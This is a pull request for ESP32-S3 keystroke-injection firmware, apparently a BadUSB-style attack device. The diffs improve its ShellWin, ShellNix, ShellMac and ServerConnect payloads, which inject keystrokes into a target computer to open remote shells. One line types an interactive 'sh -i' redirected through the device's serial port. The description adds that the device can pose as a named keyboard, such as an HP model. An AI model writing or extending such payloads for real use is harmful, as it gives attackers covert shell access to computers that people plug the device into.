### PR TITLE
Remote shell access optimizations

### DIFF
--- a/firmware/firmware.ino
+++ b/firmware/firmware.ino
@@ -951,9 +951,15 @@ void payloadExec() {
   }
 
   else if (cmd.startsWith("ShellWin ")) {
+    if (clientServer.connected()) {
+        clientServer.stop();
+        delay(100);
+    }
+
     String connectionString = cmd.substring(9);
     String ip;
     int port;
+
     // Parse IP:PORT or use default 4444
     int colonPos = connectionString.indexOf(':');
     if (colonPos == -1) {
@@ -963,6 +969,7 @@ void payloadExec() {
         ip = connectionString.substring(0, colonPos);
         port = connectionString.substring(colonPos + 1).toInt();
     }
+
     // Connect with 5 second timeout
     unsigned long startTime = millis();
     bool connected = false;
@@ -988,9 +995,15 @@ void payloadExec() {
   }
 
   else if (cmd.startsWith("ShellNix ")) {
+    if (clientServer.connected()) {
+        clientServer.stop();
+        delay(100);
+    }
+
     String connectionString = cmd.substring(9);
     String ip;
     int port;
+
     // Parse IP:PORT or use default 4444
     int colonPos = connectionString.indexOf(':');
     if (colonPos == -1) {
@@ -1000,6 +1013,7 @@ void payloadExec() {
         ip = connectionString.substring(0, colonPos);
         port = connectionString.substring(colonPos + 1).toInt();
     }
+
     // Connect with 5 second timeout
     unsigned long startTime = millis();
     bool connected = false;
@@ -1039,7 +1053,12 @@ void payloadExec() {
   }
 
   else if (cmd.startsWith("ServerConnect ")) {
-    String connectionString = cmd.substring(9);
+    if (clientServer.connected()) {
+        clientServer.stop();
+        delay(100);
+    }
+
+    String connectionString = cmd.substring(14);
     String ip;
     int port;
 
@@ -1056,7 +1075,6 @@ void payloadExec() {
     // Connect with 5 second timeout
     unsigned long startTime = millis();
     bool connected = false;
-
     while (!(connected = clientServer.connect(ip.c_str(), port))) {
         if (millis() - startTime >= 5000) {
             return;
@@ -1066,6 +1084,11 @@ void payloadExec() {
   }
   
   else if (cmd.startsWith("ShellMac ")) {
+    if (clientServer.connected()) {
+        clientServer.stop();
+        delay(100);
+    }
+
     String connectionString = cmd.substring(9);
     String ip;
     int port;
@@ -1083,7 +1106,6 @@ void payloadExec() {
     // Connect with 5 second timeout
     unsigned long startTime = millis();
     bool connected = false;
-
     while (!(connected = clientServer.connect(ip.c_str(), port))) {
         if (millis() - startTime >= 5000) {
             return;

--- a/firmware/firmware.ino
+++ b/firmware/firmware.ino
@@ -951,15 +951,27 @@ void payloadExec() {
   }
 
   else if (cmd.startsWith("ShellWin ")) {
-    cmd.toCharArray(Command, cmd.length() + 1);
-    serverIP = Command + 9;
-
-    if (!clientServer.connect(serverIP, serverPort)) {
-      while (1)
-        ;
+    String connectionString = cmd.substring(9);
+    String ip;
+    int port;
+    // Parse IP:PORT or use default 4444
+    int colonPos = connectionString.indexOf(':');
+    if (colonPos == -1) {
+        ip = connectionString;
+        port = 4444; // Default port
+    } else {
+        ip = connectionString.substring(0, colonPos);
+        port = connectionString.substring(colonPos + 1).toInt();
     }
-
-    delay(3000);
+    // Connect with 5 second timeout
+    unsigned long startTime = millis();
+    bool connected = false;
+    while (!(connected = clientServer.connect(ip.c_str(), port))) {
+        if (millis() - startTime >= 5000) {
+            return;
+        }
+        delay(100);
+    }
 
     Keyboard.press(KEY_LEFT_GUI);
     Keyboard.print("r");
@@ -976,15 +988,46 @@ void payloadExec() {
   }
 
   else if (cmd.startsWith("ShellNix ")) {
-    cmd.toCharArray(Command, cmd.length() + 1);
-    serverIP = Command + 9;
-
-    if (!clientServer.connect(serverIP, serverPort)) {
-      while (1)
-        ;
+    String connectionString = cmd.substring(9);
+    String ip;
+    int port;
+    // Parse IP:PORT or use default 4444
+    int colonPos = connectionString.indexOf(':');
+    if (colonPos == -1) {
+        ip = connectionString;
+        port = 4444; // Default port
+    } else {
+        ip = connectionString.substring(0, colonPos);
+        port = connectionString.substring(colonPos + 1).toInt();
     }
-
-    delay(3000);
+    // Connect with 5 second timeout
+    unsigned long startTime = millis();
+    bool connected = false;
+    while (!(connected = clientServer.connect(ip.c_str(), port))) {
+        if (millis() - startTime >= 5000) {
+            return;
+        }
+        delay(100);
+    }
+    // Default device name
+    String deviceName = "Espressif_Systems_ESP32S3";
+    // Check if USB config exists and get product name
+    if (LittleFS.exists("/usb_config.txt")) {
+        File usbConfig = LittleFS.open("/usb_config.txt", FILE_READ);
+        if (usbConfig) {
+            // Read productName
+            usbConfig.readStringUntil('\n');
+            usbConfig.readStringUntil('\n');
+            String productName = usbConfig.readStringUntil('\n');
+            productName.trim();
+            if (productName.length() > 0) {
+                // Replace spaces with underscores
+                productName.replace(" ", "_");
+                deviceName = productName;
+            }
+            usbConfig.close();
+        }
+    }
 
     Keyboard.press(KEY_LEFT_CTRL);
     Keyboard.press(KEY_LEFT_ALT);
@@ -992,32 +1035,61 @@ void payloadExec() {
     delay(100);
     Keyboard.releaseAll();
     delay(500);
-    Keyboard.println("sh -i > /dev/serial/by-id/*Espressif_Systems_ESP32S3* 2>&1 < /dev/serial/by-id/*Espressif_Systems_ESP32S3*");
+    Keyboard.println("sh -i > /dev/serial/by-id/*" + deviceName + "* 2>&1 < /dev/serial/by-id/*" + deviceName + "*");
   }
 
   else if (cmd.startsWith("ServerConnect ")) {
-    cmd.toCharArray(Command, cmd.length() + 1);
-    // the server IP is extracted from the Command array starting from the 14th index
-    serverIP = Command + 14;
+    String connectionString = cmd.substring(9);
+    String ip;
+    int port;
 
-    // connect loop
-    if (!clientServer.connect(serverIP, serverPort)) {
-      while (1)
-        ;
+    // Parse IP:PORT or use default 4444
+    int colonPos = connectionString.indexOf(':');
+    if (colonPos == -1) {
+        ip = connectionString;
+        port = 4444; // Default port
+    } else {
+        ip = connectionString.substring(0, colonPos);
+        port = connectionString.substring(colonPos + 1).toInt();
+    }
+
+    // Connect with 5 second timeout
+    unsigned long startTime = millis();
+    bool connected = false;
+
+    while (!(connected = clientServer.connect(ip.c_str(), port))) {
+        if (millis() - startTime >= 5000) {
+            return;
+        }
+        delay(100);
     }
   }
-
+  
   else if (cmd.startsWith("ShellMac ")) {
-    cmd.toCharArray(Command, cmd.length() + 1);
-    serverIP = Command + 9;
+    String connectionString = cmd.substring(9);
+    String ip;
+    int port;
 
-    // connect loop
-    if (!clientServer.connect(serverIP, serverPort)) {
-      while (1)
-        ;
+    // Parse IP:PORT or use default 4444
+    int colonPos = connectionString.indexOf(':');
+    if (colonPos == -1) {
+        ip = connectionString;
+        port = 4444; // Default port
+    } else {
+        ip = connectionString.substring(0, colonPos);
+        port = connectionString.substring(colonPos + 1).toInt();
     }
 
-    delay(3000);
+    // Connect with 5 second timeout
+    unsigned long startTime = millis();
+    bool connected = false;
+
+    while (!(connected = clientServer.connect(ip.c_str(), port))) {
+        if (millis() - startTime >= 5000) {
+            return;
+        }
+        delay(100);
+    }
 
     // run spotlight/alfred prompt
     Keyboard.press(KEY_LEFT_GUI);

--- a/firmware/index.h
+++ b/firmware/index.h
@@ -32,7 +32,7 @@ const char Index[] PROGMEM = R"=====(
                 <strong>Connection Status: <span class="status-indicator"></span></strong>
             </div>
             <div class="stat-group">
-                <strong>Firmware:</strong> <span id="firmware">v2.1</span>
+                <strong>Firmware:</strong> <span id="firmware">v2.2</span>
             </div>
             <div class="stat-group">
                 <strong>Connected to:</strong> <span id="ssid"></span>

--- a/firmware/index.h
+++ b/firmware/index.h
@@ -32,7 +32,7 @@ const char Index[] PROGMEM = R"=====(
                 <strong>Connection Status: <span class="status-indicator"></span></strong>
             </div>
             <div class="stat-group">
-                <strong>Firmware:</strong> <span id="firmware">v2.2</span>
+                <strong>Firmware:</strong> <span id="firmware">v2.1</span>
             </div>
             <div class="stat-group">
                 <strong>Connected to:</strong> <span id="ssid"></span>

--- a/firmware/livepayload.h
+++ b/firmware/livepayload.h
@@ -351,7 +351,7 @@ const char LivePayload[] PROGMEM = R"=====(
                 },
                 'ServerConnect': {
                     validate: args => args.length > 0,
-                    message: 'requires IP address/hostname'
+                    message: 'requires IP address/hostname or ipaddress:port'
                 },
                 'DetectOS': {
                     validate: args => args.length === 0,
@@ -371,7 +371,7 @@ const char LivePayload[] PROGMEM = R"=====(
                 },
                 'ShellWin': {
                     validate: args => args.length > 0,
-                    message: 'requires IP address'
+                    message: 'requires IP address or ipaddress:port'
                 },
                 'RunNix': {
                     validate: args => args.length > 0,
@@ -387,11 +387,11 @@ const char LivePayload[] PROGMEM = R"=====(
                 },
                 'ShellNix': {
                     validate: args => args.length > 0,
-                    message: 'requires IP address'
+                    message: 'requires IP address or ipaddress:port'
                 },
                 'ShellMac': {
                     validate: args => args.length > 0,
-                    message: 'requires IP address'
+                    message: 'requires IP address or ipaddress:port'
                 },
                 'ShellMacCleanup': {
                     validate: args => args.length === 0,


### PR DESCRIPTION
ShellNix, ShellWin, ShellMac and ServerConnect infinite loop fixed. Fixed linux remote shell bash, for users with modified USB configuration. Default usb dev path remains /dev/serial/by-id/*Espressif_Systems_ESP32S3*. But path is now modified in case usb_config.txt file exist. When usb config is found, USB product name in dev path is replaced with product name from saved USB configuration therefore new device path will be /dev/serial/by-id/*HP_Elite_USB_Keyboard* for example. With this commit users are now able to use other ports for accessing remote shell and not only 4444. This can be done with extended payload syntax ShellNix IP:port, ShellWin IP:port,... If port is not appended after IP input (like ShellNix 1.1.1.1), then default port 4444 is used.